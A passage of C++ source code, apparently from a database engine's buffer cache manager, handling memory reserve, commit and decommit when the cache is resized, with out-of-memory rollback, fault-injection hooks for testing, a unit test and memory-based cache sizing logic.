return ( pbf->bfat == bfatNone && pbf->pv == NULL ) ||
( pbf->bfat != bfatNone && pbf->pv != NULL );
}
// designed to operate in the place of "operation" type functions like FOSMemoryPageCommit() where
// true is success, and false is failure. You can still set an error in the fault injection field
// and it will return false here.
#define FOpFI( ulID ) ( ( ErrFaultInjection( ulID ) < JET_errSuccess ) ? fFalse : fTrue )
#define AllocFI( ulID, func ) \
{ \
if ( ErrFaultInjection( ulID ) < JET_errSuccess ) \
{ \
Alloc( NULL ); \
} \
else \
{ \
Alloc( func ); \
} \
}
ERR ErrBFICacheISetDataSize( const LONG_PTR cpgCacheStart, const LONG_PTR cpgCacheNew )
{
ERR err = JET_errSuccess;
Assert( g_critCacheSizeResize.FOwner() );
// if we are mapping views then do not allocate data blocks
if ( BoolParam( JET_paramEnableViewCache ) )
{
return JET_errSuccess;
}
// set the current cache size as the starting cache size. this is the
// effective cache size for purposes of recovering on an OOM
LONG_PTR cpgCacheCur = cpgCacheStart;
// convert the current and new cache sizes into chunks
//
// NOTE: this function relies on the fact that if either cpgCacheStart or
// cpgCacheNew are 0, then ipgChunkStart or ipgChunkNew will become -1.
// do not change their types to unsigned!!!
const LONG_PTR ipgChunkStart = cpgCacheStart ? ( cpgCacheStart - 1 ) / g_cpgChunk : -1;
const LONG_PTR ipgChunkNew = cpgCacheNew ? ( cpgCacheNew - 1 ) / g_cpgChunk : -1;
// the cache size has grown
if ( ipgChunkNew > ipgChunkStart )
{
// this is not the first allocation or an aligned allocation
if ( cpgCacheStart % g_cpgChunk )
{
// make sure that all the memory in the chunk at the end of the cache
// is committed
const size_t ib = ( cpgCacheStart % g_cpgChunk ) * g_rgcbPageSize[g_icbCacheMax];
const size_t cb = ( ( ipgChunkStart + 1 ) * g_cpgChunk - cpgCacheStart ) * g_rgcbPageSize[g_icbCacheMax];
void* const pvStart = (BYTE*)g_rgpvChunk[ ipgChunkStart ] + ib;
if ( !FOpFI( 33032 ) || !FOSMemoryPageCommit( pvStart, cb ) )
{
Call( ErrERRCheck( JET_errOutOfMemory ) );
}
}
// allocate cache chunks for the new range
for ( LONG_PTR ipgChunkAlloc = ipgChunkStart + 1; ipgChunkAlloc <= ipgChunkNew; ipgChunkAlloc++ )
{
// reserve a new cache chunk
const size_t cbChunkAlloc = g_cpgChunk * g_rgcbPageSize[g_icbCacheMax];
AllocFI( 49416, g_rgpvChunk[ ipgChunkAlloc ] = PvOSMemoryPageReserve( cbChunkAlloc, NULL ) );
g_cbCacheReservedSize += (ULONG_PTR)cbChunkAlloc; // atomic not required here
Assert( (LONG_PTR)g_cbCacheReservedSize >= (LONG_PTR)cbChunkAlloc );
// update the cache size to reflect the new cache chunk
//
// NOTE: we do this to make OOM recovery easier
cpgCacheCur = min( cpgCacheNew, ( ipgChunkAlloc + 1 ) * g_cpgChunk );
// commit only the memory which will be in use
const size_t ib = 0;
const size_t cb = min( g_cpgChunk, cpgCacheNew - ipgChunkAlloc * g_cpgChunk ) * g_rgcbPageSize[g_icbCacheMax];
void* const pvStart = (BYTE*)g_rgpvChunk[ ipgChunkAlloc ] + ib;
if ( !FOpFI( 48904 ) || !FOSMemoryPageCommit( pvStart, cb ) )
{
Call( ErrERRCheck( JET_errOutOfMemory ) );
}
}
}
// the cache size has shrunk
else if ( ipgChunkNew < ipgChunkStart )
{
// free cache chunks for the new range
for ( LONG_PTR ipgChunkFree = ipgChunkNew + 1; ipgChunkFree <= ipgChunkStart; ipgChunkFree++ )
{
void* const pvChunkFree = g_rgpvChunk[ ipgChunkFree ];
g_rgpvChunk[ ipgChunkFree ] = NULL;
const size_t cbChunkFree = g_cpgChunk * g_rgcbPageSize[g_icbCacheMax];
OSMemoryPageDecommit( pvChunkFree, cbChunkFree );
OSMemoryPageFree( pvChunkFree );
g_cbCacheReservedSize -= (ULONG_PTR)cbChunkFree; // atomic not required here
Assert( (LONG_PTR)g_cbCacheReservedSize >= 0 );
}
// reset cache that will not be in use, being careful of page granularity
const LONG_PTR cpgPerPage = max( 1, OSMemoryPageCommitGranularity() / g_rgcbPageSize[g_icbCacheMax] );
Expected( cpgPerPage == 1 ); // 2KB pages and Itanium are dead.
LONG_PTR cpgCommit = cpgCacheNew - ipgChunkNew * g_cpgChunk + cpgPerPage - 1;
cpgCommit -= cpgCommit % cpgPerPage;
LONG_PTR cpgCommitMax = g_cpgChunk + cpgPerPage - 1;
cpgCommitMax -= cpgCommitMax % cpgPerPage;
const LONG_PTR cpgReset = cpgCommitMax - cpgCommit;
if ( cpgReset )
{
OSMemoryPageReset( (BYTE*)g_rgpvChunk[ ipgChunkNew ] + cpgCommit * g_rgcbPageSize[g_icbCacheMax],
cpgReset * g_rgcbPageSize[g_icbCacheMax],
fTrue );
}
}
// the cache size has stayed the same (at least chunk-wise)
else
{
// the cache size has grown but less than one chunk
if ( cpgCacheNew > cpgCacheStart )
{
// commit only the memory which will be in use
const size_t ib = ( cpgCacheStart % g_cpgChunk ) * g_rgcbPageSize[g_icbCacheMax];
const size_t cb = ( cpgCacheNew - cpgCacheStart ) * g_rgcbPageSize[g_icbCacheMax];
void* const pvStart = (BYTE*)g_rgpvChunk[ ipgChunkStart ] + ib;
if ( !FOpFI( 65288 ) || !FOSMemoryPageCommit( pvStart, cb ) )
{
Call( ErrERRCheck( JET_errOutOfMemory ) );
}
}
// the cache size has shrunk but less than one chunk
else if ( cpgCacheNew < cpgCacheStart )
{
// reset cache that will not be in use, being careful of page granularity
const LONG_PTR cpgPerPage = max( 1, OSMemoryPageCommitGranularity() / g_rgcbPageSize[g_icbCacheMax] );
LONG_PTR cpgCommit = cpgCacheNew - ipgChunkNew * g_cpgChunk + cpgPerPage - 1;
cpgCommit -= cpgCommit % cpgPerPage;
LONG_PTR cpgCommitMax = g_cpgChunk + cpgPerPage - 1;
cpgCommitMax -= cpgCommitMax % cpgPerPage;
const LONG_PTR cpgReset = cpgCommitMax - cpgCommit;
const size_t ib = cpgCommit * g_rgcbPageSize[g_icbCacheMax];
const size_t cb = cpgReset * g_rgcbPageSize[g_icbCacheMax];
if ( cpgReset )
{
OSMemoryPageReset( (BYTE*)g_rgpvChunk[ ipgChunkNew ] + ib,
cb,
fTrue );
}
}
}
return JET_errSuccess;
// on an error, rollback all changes
HandleError:
Assert( cpgCacheCur >= cpgCacheStart );
CallS( ErrBFICacheISetDataSize( cpgCacheCur, cpgCacheStart ) );
return err;
}
ERR ErrBFICacheISetStatusSize( const LONG_PTR cbfCacheStart, const LONG_PTR cbfCacheNew )
{
ERR err = JET_errSuccess;
Assert( g_critCacheSizeResize.FOwner() );
// set the current cache size as the starting cache size. this is the
// effective cache size for purposes of recovering on an OOM
LONG_PTR cbfCacheCur = cbfCacheStart;
// convert the current and new cache sizes into chunks
//
// NOTE: this function relies on the fact that if either cbfCacheStart or
// cbfCacheNew are 0, then ibfChunkStart or ibfChunkNew will become -1.
// do not change their types to unsigned!!!
const LONG_PTR ibfChunkStart = cbfCacheStart ? ( cbfCacheStart - 1 ) / g_cbfChunk : -1;
const LONG_PTR ibfChunkNew = cbfCacheNew ? ( cbfCacheNew - 1 ) / g_cbfChunk : -1;
// the cache size has grown
if ( ibfChunkNew > ibfChunkStart )
{
// this is not the first allocation or an aligned allocation
if ( cbfCacheStart % g_cbfChunk )
{
// make sure that all the memory in the chunk at the end of the cache
// is committed
const size_t ib = ( cbfCacheStart % g_cbfChunk ) * sizeof( BF );
const size_t cb = ( ( ibfChunkStart + 1 ) * g_cbfChunk - cbfCacheStart ) * sizeof( BF );
if ( !FOpFI( 40712 ) || !FOSMemoryPageCommit( (BYTE*)g_rgpbfChunk[ ibfChunkStart ] + ib, cb ) )
{
Call( ErrERRCheck( JET_errOutOfMemory ) );
}
}
// allocate cache chunks for the new range
for ( LONG_PTR ibfChunkAlloc = ibfChunkStart + 1; ibfChunkAlloc <= ibfChunkNew; ibfChunkAlloc++ )
{
// reserve a new cache chunk
AllocFI( 57096, g_rgpbfChunk[ ibfChunkAlloc ] = (PBF)PvOSMemoryPageReserve( g_cbfChunk * sizeof( BF ), NULL ) );
// update the cache size to reflect the new cache chunk
//
// NOTE: we do this to make OOM recovery easier
cbfCacheCur = min( cbfCacheNew, ( ibfChunkAlloc + 1 ) * g_cbfChunk );
// commit only the memory which will be in use
const size_t ib = 0;
const size_t cb = min( g_cbfChunk, cbfCacheNew - ibfChunkAlloc * g_cbfChunk ) * sizeof( BF );
if ( !FOpFI( 44808 ) || !FOSMemoryPageCommit( (BYTE*)g_rgpbfChunk[ ibfChunkAlloc ] + ib, cb ) )
{
Call( ErrERRCheck( JET_errOutOfMemory ) );
}
}
}
// the cache size has shrunk
else if ( ibfChunkNew < ibfChunkStart )
{
// free cache chunks for the new range
for ( LONG_PTR ibfChunkFree = ibfChunkNew + 1; ibfChunkFree <= ibfChunkStart; ibfChunkFree++ )
{
const PBF pbfChunkFree = g_rgpbfChunk[ ibfChunkFree ];
g_rgpbfChunk[ ibfChunkFree ] = NULL;
OSMemoryPageDecommit( pbfChunkFree, g_cbfChunk * sizeof( BF ) );
OSMemoryPageFree( pbfChunkFree );
}
// reset cache that will not be in use, being careful of page granularity
const LONG_PTR cbfPerPage = max( 1, OSMemoryPageCommitGranularity() / sizeof( BF ) );
LONG_PTR cbfCommit = cbfCacheNew - ibfChunkNew * g_cbfChunk + cbfPerPage - 1;
cbfCommit -= cbfCommit % cbfPerPage;
LONG_PTR cbfCommitMax = g_cbfChunk + cbfPerPage - 1;
cbfCommitMax -= cbfCommitMax % cbfPerPage;
const LONG_PTR cbfReset = cbfCommitMax - cbfCommit;
if ( cbfReset )
{
OSMemoryPageReset( g_rgpbfChunk[ ibfChunkNew ] + cbfCommit,
cbfReset * sizeof( BF ),
fTrue );
}
}
// the cache size has stayed the same (at least chunk-wise)
else
{
// the cache size has grown but less than one chunk
if ( cbfCacheNew > cbfCacheStart )
{
// commit only the memory which will be in use
const size_t ib = ( cbfCacheStart % g_cbfChunk ) * sizeof( BF );
const size_t cb = ( cbfCacheNew - cbfCacheStart ) * sizeof( BF );
if ( !FOpFI( 61192 ) || !FOSMemoryPageCommit( (BYTE*)g_rgpbfChunk[ ibfChunkStart ] + ib, cb ) )
{
Call( ErrERRCheck( JET_errOutOfMemory ) );
}
}
// the cache size has shrunk but less than one chunk
else if ( cbfCacheNew < cbfCacheStart )
{
// reset cache that will not be in use, being careful of page granularity
const LONG_PTR cbfPerPage = max( 1, OSMemoryPageCommitGranularity() / sizeof( BF ) );
LONG_PTR cbfCommit = cbfCacheNew - ibfChunkNew * g_cbfChunk + cbfPerPage - 1;
cbfCommit -= cbfCommit % cbfPerPage;
LONG_PTR cbfCommitMax = g_cbfChunk + cbfPerPage - 1;
cbfCommitMax -= cbfCommitMax % cbfPerPage;
const LONG_PTR cbfReset = cbfCommitMax - cbfCommit;
if ( cbfReset )
{
OSMemoryPageReset( g_rgpbfChunk[ ibfChunkNew ] + cbfCommit,
cbfReset * sizeof( BF ),
fTrue );
}
}
}
return JET_errSuccess;
// on an error, rollback all changes
HandleError:
CallS( ErrBFICacheISetStatusSize( cbfCacheCur, cbfCacheStart ) );
return err;
}
// sets the allocated size of the cache, allocating or freeing memory as
// necessary
ERR ErrBFICacheISetSize( const LONG_PTR cbfCacheAddressableNew )
{
ERR err = JET_errSuccess;
Assert( g_critCacheSizeResize.FOwner() );
// save the starting cache size
const LONG_PTR cbfCacheAddressableStart = cbfCacheAddressable;
// check our inputs
if ( cbfCacheAddressableStart < 0 )
{
AssertSz( fFalse, "At some point we had a negative cache size!!!?" );
Error( ErrERRCheck( JET_errInvalidParameter ) );
}
if ( cbfCacheAddressableNew < 0 )
{
AssertSz( fFalse, "Someone is trying to set a negative cache size!!!?" );
Error( ErrERRCheck( JET_errInvalidParameter ) );
}
AssertRTL( cbfCacheAddressableNew != 0 || !g_fBFInitialized /* i.e. during term */ );
// grow / shrink our data storage or rollback on OOM
Call( ErrBFICacheISetDataSize( cbfCacheAddressableStart, cbfCacheAddressableNew ) );
// the cache size has grown
if ( cbfCacheAddressableNew > cbfCacheAddressableStart )
{
#ifdef DEBUG
// if we are growing to an old init'd value, we should find quieced BFs
for ( LONG_PTR ibfInit = cbfCacheAddressableStart; ibfInit < cbfInit; ibfInit++ )
{
PBF pbf = PbfBFICacheIbf( ibfInit );
Assert( pbf->fQuiesced );
}
#endif
// grow our status storage iff we are growing past cbfInit
if ( cbfCacheAddressableNew > cbfInit )
{
// grow our status storage or rollback on OOM
if ( ( err = ErrBFICacheISetStatusSize( cbfInit, cbfCacheAddressableNew ) ) < JET_errSuccess )
{
CallS( ErrBFICacheISetDataSize( cbfCacheAddressableNew, cbfCacheAddressableStart ) );
return err;
}
// init all BFs in the newly allocated range
for ( LONG_PTR ibfInit = cbfInit; ibfInit < cbfCacheAddressableNew; ibfInit++ )
{
PBF pbf = PbfBFICacheIbf( ibfInit );
// use placement new to initialize this BF
new( pbf ) BF;
CSXWLatch::ERR errSXWL = pbf->sxwl.ErrTryAcquireWriteLatch();
Assert( errSXWL == CSXWLatch::ERR::errSuccess );
pbf->sxwl.ReleaseOwnership( bfltWrite );
// mark this BF as initialized
cbfInit = ibfInit + 1;
}
}
// initialize and free all BFs in the added range
for ( LONG_PTR ibfInit = cbfCacheAddressableStart; ibfInit < cbfCacheAddressableNew; ibfInit++ )
{
PBF pbf = PbfBFICacheIbf( ibfInit );
// set this BF's page pointer
pbf->pv = PvBFICacheIpg( ibfInit );
// update buffer state
pbf->fNewlyEvicted = fFalse;
pbf->icbBuffer = g_icbCacheMax;
Assert( icbPageInvalid == pbf->icbPage );
const BFResidenceState bfrsOld = BfrsBFIUpdateResidentState( pbf, bfrsNewlyCommitted );
Expected( bfrsOld == bfrsNotCommitted );
// set the allocation type
if ( !UlParam( JET_paramEnableViewCache ) )
{
// Note: ErrBFICacheISetDataSize() bails pre-reserve / commit on JET_paramEnableViewCache ...
pbf->bfat = bfatFracCommit;
Assert( g_icbCacheMax == pbf->icbBuffer );
OnDebug( const LONG_PTR cbCacheCommittedSizeInitial = (LONG_PTR)) AtomicExchangeAddPointer( (void**)&g_cbCacheCommittedSize, (void*)(ULONG_PTR)g_rgcbPageSize[pbf->icbBuffer] );
Assert( cbCacheCommittedSizeInitial >= 0 );
}
Assert( ( pbf->bfat == bfatFracCommit && pbf->pv != NULL ) ||
( pbf->bfat == bfatNone && pbf->pv == NULL ) );
Assert( FBFIValidPvAllocType( pbf ) );
// free this BF to the avail pool
pbf->sxwl.ClaimOwnership( bfltWrite );
BFIFreePage( pbf, fFalse );
// increase the actual cache size
Assert( cbfCacheAddressable == ibfInit );
const ULONG_PTR cbfCacheAddressableNext = ibfInit + 1;
Enforce( ( cbfCacheAddressableNext > 0 ) || ( cbfCacheAddressableNext == 0 && !g_fBFInitialized ) );
cbfCacheAddressable = cbfCacheAddressableNext;
}
}
// the cache size has shrunk
else if ( cbfCacheAddressableNew < cbfCacheAddressableStart )
{
// terminate all BFs in the removed range
for ( LONG_PTR ibfTerm = cbfCacheAddressableStart - 1; ibfTerm >= cbfCacheAddressableNew; ibfTerm-- )
{
PBF pbf = PbfBFICacheIbf( ibfTerm );
// decrease the actual cache size
Assert( cbfCacheAddressable == ibfTerm + 1 );
Enforce( ( ibfTerm > 0 ) || ( ibfTerm == 0 && !g_fBFInitialized ) );
cbfCacheAddressable = ibfTerm;
// update the buffer state
const BFResidenceState bfrsOld = BfrsBFIUpdateResidentState( pbf, bfrsNotCommitted );
Expected( bfrsOld != bfrsNotCommitted || ( pbf->fQuiesced || pbf->fAvailable ) );
if ( pbf->bfat == bfatFracCommit )
{
OnDebug( const LONG_PTR cbCacheCommittedSizeInitial = (LONG_PTR)) AtomicExchangeAddPointer( (void**)&g_cbCacheCommittedSize, (void*)( -( (LONG_PTR)g_rgcbPageSize[pbf->icbBuffer] ) ) );
Assert( cbCacheCommittedSizeInitial >= g_rgcbPageSize[pbf->icbBuffer] );
}
pbf->fNewlyEvicted = fFalse;
// clear this BF's page pointer / alloc type
pbf->pv = NULL;
pbf->bfat = bfatNone;
Assert( FBFIValidPvAllocType( pbf ) );
}
// shrink our status storage iff we are terminating the cache
if ( 0 == cbfCacheAddressableNew )
{
// terminate all initialized BFs
const LONG_PTR cbfTerm = cbfInit;
for ( LONG_PTR ibfTerm = cbfTerm - 1; ibfTerm >= 0; ibfTerm-- )
{
PBF pbf = PbfBFICacheIbf( ibfTerm );
// mark this BF as terminated
cbfInit = ibfTerm;
// think this will always hold b/c if we're about to release this
// buffer then it should be available (i.e. freed from using data)
// or quiesced (i.e. in the shrunk-quiesced state). there may be
// another state I'm missing
Expected( pbf->fQuiesced || pbf->fAvailable );
// explicitly destruct this BF
if ( pbf->fQuiesced || pbf->fAvailable )
{
pbf->sxwl.ClaimOwnership( bfltWrite );
pbf->sxwl.ReleaseWriteLatch();
}
pbf->~BF();
}
// shrink our status storage
CallS( ErrBFICacheISetStatusSize( cbfTerm, 0 ) );
};
}
HandleError:
return err;
}
LOCAL BOOL FBFICacheSizeFixed()
{
return ( UlParam( JET_paramCacheSizeMin ) == UlParam( JET_paramCacheSizeMax ) ||
g_cbfCacheUserOverride != 0 );
}
LOCAL BOOL FBFICacheApproximatelyEqual( const ULONG_PTR cbfTarget, const ULONG_PTR cbfCurrent )
{
if ( cbfCurrent > 0 )
{
// Only one buffer is considered acceptable.
if ( absdiff( cbfTarget, cbfCurrent ) == 1 )
{
return fTrue;
}
// Calculate the fraction.
const double fracCbfCache = (double)absdiff( cbfTarget, cbfCurrent ) / (double)cbfCurrent;
if ( fracCbfCache <= fracMaintCacheSensitivity )
{
return fTrue;
}
return fFalse;
}
else
{
return ( cbfTarget == cbfCurrent );
}
}
#ifdef ENABLE_JET_UNIT_TEST
JETUNITTEST( BF, TestCbfSameWithinSensitivity )
{
const ULONG_PTR cbfCurrent = 1000;
const ULONG_PTR dcbfWithinRange = (ULONG_PTR)( cbfCurrent * fracMaintCacheSensitivity );
const ULONG_PTR cbfCurrentSmall = 10;
const ULONG_PTR dcbfWithinRangeSmall = (ULONG_PTR)( cbfCurrentSmall * fracMaintCacheSensitivity );
const ULONG_PTR dcbfOutsideRangeSmall = 1;
// Self-checks.
CHECK( dcbfWithinRange < cbfCurrent );
CHECK( cbfCurrent != 0 );
CHECK( dcbfWithinRange != 0 );
CHECK( dcbfWithinRangeSmall < cbfCurrentSmall );
CHECK( dcbfOutsideRangeSmall < cbfCurrentSmall );
CHECK( dcbfWithinRangeSmall < dcbfOutsideRangeSmall );
CHECK( cbfCurrentSmall != 0 );
CHECK( dcbfOutsideRangeSmall != 0 );
// Zeroed current.
CHECK( FBFICacheApproximatelyEqual( 0, 0 ) );
CHECK( !FBFICacheApproximatelyEqual( 1, 0 ) );
CHECK( !FBFICacheApproximatelyEqual( 1000, 0 ) );
// Small current.
CHECK( FBFICacheApproximatelyEqual( cbfCurrentSmall, cbfCurrentSmall ) );
CHECK( FBFICacheApproximatelyEqual( cbfCurrentSmall - dcbfWithinRangeSmall, cbfCurrentSmall ) );
CHECK( FBFICacheApproximatelyEqual( cbfCurrentSmall + dcbfWithinRangeSmall, cbfCurrentSmall ) );
CHECK( FBFICacheApproximatelyEqual( cbfCurrentSmall - dcbfOutsideRangeSmall, cbfCurrentSmall ) );
CHECK( FBFICacheApproximatelyEqual( cbfCurrentSmall + dcbfOutsideRangeSmall, cbfCurrentSmall ) );
CHECK( !FBFICacheApproximatelyEqual( cbfCurrentSmall - dcbfOutsideRangeSmall - 1, cbfCurrentSmall ) );
CHECK( !FBFICacheApproximatelyEqual( cbfCurrentSmall + dcbfOutsideRangeSmall + 1, cbfCurrentSmall ) );
// Normal.
CHECK( FBFICacheApproximatelyEqual( cbfCurrent, cbfCurrent ) );
CHECK( FBFICacheApproximatelyEqual( cbfCurrent - dcbfWithinRange, cbfCurrent ) );
CHECK( FBFICacheApproximatelyEqual( cbfCurrent + dcbfWithinRange, cbfCurrent ) );
CHECK( !FBFICacheApproximatelyEqual( cbfCurrent - dcbfWithinRange - 1, cbfCurrent ) );
CHECK( !FBFICacheApproximatelyEqual( cbfCurrent + dcbfWithinRange + 1, cbfCurrent ) );
}
#endif // ENABLE_JET_UNIT_TEST
///////////////////////////////////////
// Cache Resource Allocation Manager
CCacheRAM g_cacheram;
inline CCacheRAM::CCacheRAM()
: CDBAResourceAllocationManager< cMaintCacheSamplesAvg >()
{
Reset();
}
inline CCacheRAM::~CCacheRAM()
{
}
inline void CCacheRAM::Reset()
{
m_cpgReclaimCurr = 0;
m_cpgReclaimLast = 0;
m_cpgReclaimNorm = 0;
m_cpgEvictCurr = 0;
m_cpgEvictLast = 0;
m_cpgEvictNorm = 0;
m_cpgPhysicalMemoryEvictedLast = 0;
m_cbTotalPhysicalMemoryEvicted = 0;
m_cbTotalResourcesEvictedLast = 0;
m_cbTotalResourcesEvicted = 0;
m_cbfCacheNewDiscrete = 0;
m_cbOptimalResourcePoolSizeUsedLast = 0;
m_dcbAdjustmentOverride = 0;
}
inline size_t CCacheRAM::TotalPhysicalMemory()
{
// return the amount of physical memory, taking quotas into account
return OSMemoryQuotaTotal();
}
inline size_t CCacheRAM::AvailablePhysicalMemory()
{
// return the amount of available physical memory, taking quotas into
// account
const QWORD cbAvail = OSMemoryAvailable();
const size_t cbTotal = OSMemoryQuotaTotal();
const QWORD cbPool = this->TotalResources();
size_t cbTemp = cbTotal > cbPool ? (size_t)( cbTotal - cbPool ) : 0;
Assert( min( cbAvail, (QWORD)cbTemp ) == (size_t)min( cbAvail, cbTemp ) );
return (size_t)min( cbAvail, cbTemp );
}
inline size_t CCacheRAM::TotalPhysicalMemoryEvicted()
{
const size_t cbQuotaTotal = OSMemoryQuotaTotal();
const QWORD cbTotal = OSMemoryTotal();
// scale our page reclaim count up to approximate what the page reclaim
// count should be for the system, taking quotas into account
const double fracCache = (double)CbBFICacheBufferSize() / (double)cbQuotaTotal;
m_cpgReclaimCurr = g_cpgReclaim;
m_cpgReclaimNorm += (DWORD)( ( m_cpgReclaimCurr - m_cpgReclaimLast ) / fracCache + 0.5 );
m_cpgReclaimLast = m_cpgReclaimCurr;
// scale the OS eviction count to take quotas into account
//
// NOTE: one can set quotas such that different pools end up having
// different memory priorities. for example, a pool in a process with a
// max size of 128MB will shrink twice as fast as a pool in a process with
// a max size of 64MB
const double fracQuota = (double)cbQuotaTotal / (double)cbTotal;
m_cpgEvictCurr = OSMemoryPageEvictionCount();
m_cpgEvictNorm += (DWORD)( ( m_cpgEvictCurr - m_cpgEvictLast ) * fracQuota + 0.5 );
m_cpgEvictLast = m_cpgEvictCurr;
// the page eviction count is the sum of the OS eviction count and the
// page reclaim count which we approximate above
const DWORD cpgPhysicalMemoryEvicted = m_cpgEvictNorm + m_cpgReclaimNorm;
m_cbTotalPhysicalMemoryEvicted += ( cpgPhysicalMemoryEvicted - m_cpgPhysicalMemoryEvictedLast ) * (size_t)OSMemoryPageCommitGranularity();
m_cpgPhysicalMemoryEvictedLast = cpgPhysicalMemoryEvicted;
return m_cbTotalPhysicalMemoryEvicted;
}
inline QWORD CCacheRAM::TotalResources()
{
return (QWORD)CbBFICacheBufferSize();
}
inline QWORD CCacheRAM::TotalResourcesEvicted()
{
const DWORD cbTotalResourcesEvicted = g_cbNewlyEvictedUsed;
m_cbTotalResourcesEvicted += ( cbTotalResourcesEvicted - m_cbTotalResourcesEvictedLast );
m_cbTotalResourcesEvictedLast = cbTotalResourcesEvicted;
return m_cbTotalResourcesEvicted;
}
QWORD CbBFIMaintCacheSizeIAdjust_( const QWORD cbCurrrent, const double cbDelta )
{
if ( cbDelta < 0.0 && (QWORD)-cbDelta > cbCurrrent )
{
return 0;
}
else if ( cbDelta > 0.0 && (QWORD)cbDelta > ( qwMax - cbCurrrent ) )
{
return qwMax;
}
else
{
return ( cbDelta > 0.0 ? cbCurrrent + (QWORD)cbDelta : cbCurrrent - (QWORD)-cbDelta ) ;
}
}
inline QWORD CCacheRAM::GetOptimalResourcePoolSize()
{
return m_cbOptimalResourcePoolSizeUsedLast;
}
void CCacheRAM::UpdateStatistics()
{
Assert( g_critCacheSizeSetTarget.FOwner() );
__super::UpdateStatistics();
}
void CCacheRAM::ConsumeResourceAdjustments( __out double * const pdcbTotalResource, __in const double cbResourceSize )
{
Assert( g_critCacheSizeSetTarget.FOwner() );
if ( m_dcbAdjustmentOverride != 0 )
{
const __int64 dcbAdjustmentOverride = (__int64)m_dcbAdjustmentOverride;
*pdcbTotalResource = (double)roundup( dcbAdjustmentOverride, (__int64)cbResourceSize );
m_dcbAdjustmentOverride = 0;
}
else
{
__super::ConsumeResourceAdjustments( pdcbTotalResource, cbResourceSize );
}
}
void CCacheRAM::OverrideResourceAdjustments( double const dcbRource )
{
Assert( g_critCacheSizeSetTarget.FOwner() );
m_dcbAdjustmentOverride = dcbRource;
}
inline void CCacheRAM::SetOptimalResourcePoolSize()
{
Assert( g_critCacheSizeSetTarget.FOwner() );
// retrieve adjustment to current pool size from DBA / resmgr
double dcbTotalResource = 0.0;
g_cacheram.ConsumeResourceAdjustments( &dcbTotalResource, (double)g_rgcbPageSize[g_icbCacheMax] );
// compute the optimal amount of memory that this resource pool should have
QWORD cbOptimalResources = CbBFIMaintCacheSizeIAdjust_( m_cbOptimalResourcePoolSizeUsedLast, dcbTotalResource );
cbOptimalResources = min( cbOptimalResources, OSMemoryQuotaTotal() );
cbOptimalResources = max( cbOptimalResources, (QWORD)( cbfCacheMinMin * g_rgcbPageSize[g_icbCacheMax] ) );
Assert( cbOptimalResources > 0 );
// the optimal resouce pool size will be the new cache size
LONG_PTR cbfCacheNew = (LONG_PTR)( cbOptimalResources / g_rgcbPageSize[g_icbCacheMax] );
Enforce( cbfCacheNew >= 0 );
// if the cache size is being controlled externally then override the RAM
cbfCacheNew = g_cbfCacheUserOverride ? g_cbfCacheUserOverride : cbfCacheNew;
// limit the new cache size to the preferred operating range of cache sizes
const ULONG_PTR cbfCacheSizeMin = UlParam( JET_paramCacheSizeMin );
const ULONG_PTR cbfCacheSizeMax = UlParam( JET_paramCacheSizeMax );
cbfCacheNew = UlpBound( (ULONG_PTR)cbfCacheNew, (ULONG_PTR)cbfCacheSizeMin, (ULONG_PTR)cbfCacheSizeMax );
Enforce( cbfCacheNew > 0 );
// this is the value we want to snapshot to utilize on the next optimal pool size calculation
m_cbOptimalResourcePoolSizeUsedLast = (QWORD)cbfCacheNew * (QWORD)g_rgcbPageSize[g_icbCacheMax];
// buffer credit we are entitled to since the buffer manager is saving memory due to dehydrations
const LONG_PTR cbfCredit = CbfBFICredit();
g_avgCbfCredit.AddSample( cbfCredit );
cbfCacheNew += CbfBFIAveCredit();
Enforce( cbfCacheNew > 0 );
// we will discretize the suggested cache size to avoid too many small growths and shrinkages
// around the same value, once we reach a steady state.
// we will apply hysteresis to this behavior, to avoid growing/shrinking very rapidly around the
// same value.
// this will only be done for an active DBA. fixed cache size configurations will quiesce using
// the same sensitivity, so the effect will be similar when deciding to wake up.
if ( !FBFICacheSizeFixed() )
{
if ( !FBFICacheApproximatelyEqual( (ULONG_PTR)cbfCacheNew, (ULONG_PTR)m_cbfCacheNewDiscrete ) )
{
// we've migrated outside of the dehydration granularity / sensitivity
// accept and save the new cache size
m_cbfCacheNewDiscrete = cbfCacheNew;
}
else
{
// keep the same cache size
cbfCacheNew = m_cbfCacheNewDiscrete;
}
Enforce( m_cbfCacheNewDiscrete > 0 );
Enforce( cbfCacheNew > 0 );
}
// Limit how much cache memory we can use by the amount of virtual address
// space left in our process. we do this so that we do not starve other
// consumers of virtual address space on machines with more physical
// memory than can be mapped in the current process
//
// In 32-bit, limit the cache size to half of VA to avoid VA exhaustion due
// to memory fragmentation caused by shrink
//
// Another consumer of VA is memory-mapped I/O. The OS's minimum VA
// granularity for mapping files is 64k. Even when we only care about a single page in
// that 64k region the entire 64k is mapped. Then when another page is desired,
// we don't currently resue that 64k region, but map an entirely new section. This
// can explode the Commit Charge (it's worse for smaller pages), but the Private
// Bytes are only the ones that are touched (the untouched COW pages aren't Private).
//
// The implications of this are:
//
// - other consumers of VA can push us out of memory and there is no way
// for us to push back because VA is not "paged" by the system
// - multiple DBAs that do this cannot co-exist in the same process
// because they will not converge or balance their memory consumption
//
// NOTE: this is only a factor on systems with limited VA
const size_t cbVATotal = size_t( OSMemoryPageReserveTotal() * fracVAMax );
const size_t iViewCacheDilutionFactor = BoolParam( JET_paramEnableViewCache ) ? OSMemoryPageReserveGranularity() / g_rgcbPageSize[g_icbCacheMax] : 1;
Enforce( iViewCacheDilutionFactor >= 1 );
Enforce( iViewCacheDilutionFactor <= 32 ); // Assuming 64k VA granularity, then 2k pages would give the worst result.
const size_t cbVAAvailMin = size_t( cbVATotal * fracVAAvailMin );
const size_t cbVAAvail = OSMemoryPageReserveAvailable();
const size_t cbVACache = ( ( cbfCacheAddressable + g_cpgChunk - 1 ) / g_cpgChunk ) * g_cpgChunk * g_rgcbPageSize[g_icbCacheMax];
const size_t cbVACacheMax = ( min( cbVATotal, max( cbVAAvailMin, cbVACache + cbVAAvail ) ) - cbVAAvailMin ) / iViewCacheDilutionFactor;
const size_t cbfVACacheMax = ( cbVACacheMax / g_rgcbPageSize[g_icbCacheMax] / g_cpgChunk ) * g_cpgChunk;
cbfCacheNew = min( (size_t)cbfCacheNew, cbfVACacheMax );
cbfCacheNew = max( cbfCacheNew, 1 ); // do not let it fall to 0
Enforce( cbfCacheNew > 0 );
// store the theoretical optimal cache size
g_cbfCacheTargetOptimal = cbfCacheNew;
BFIMaintAvailPoolUpdateThresholds( g_cbfCacheTargetOptimal );
// if the new cache size is below the deadlock threshold then force it to
// be large enough to avoid the deadlock
cbfCacheNew = UlpFunctionalMax( cbfCacheNew, cbfCacheDeadlock );
